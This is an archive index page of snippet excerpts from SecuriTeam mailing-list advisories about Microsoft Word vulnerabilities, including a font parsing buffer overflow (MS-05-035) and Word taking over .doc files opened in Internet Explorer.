sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... When a ".doc" file is opened inside Internet Explorer, Microsoft Word XP ... "takes over" and opens that doc file. ... http://example.com/myfile.doc is a valid request. ... (Securiteam) [NT] Microsoft Word Font Parsing Buffer Overflow Vulnerability (Technical Details, MS-05-035) ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Microsoft Word is the word processing component of the ... * 24.03.05 - Initial vendor response ... (Securiteam)

---

• Security
• UNIX
• Linux
• Coding
• Usenet

• News
• Mailing-Lists
• Newsgroups
• Service
• About
• Privacy
• Search
• Imprint

www.derkeiler.com  > Mailing-Lists  > Securiteam  > 2006-07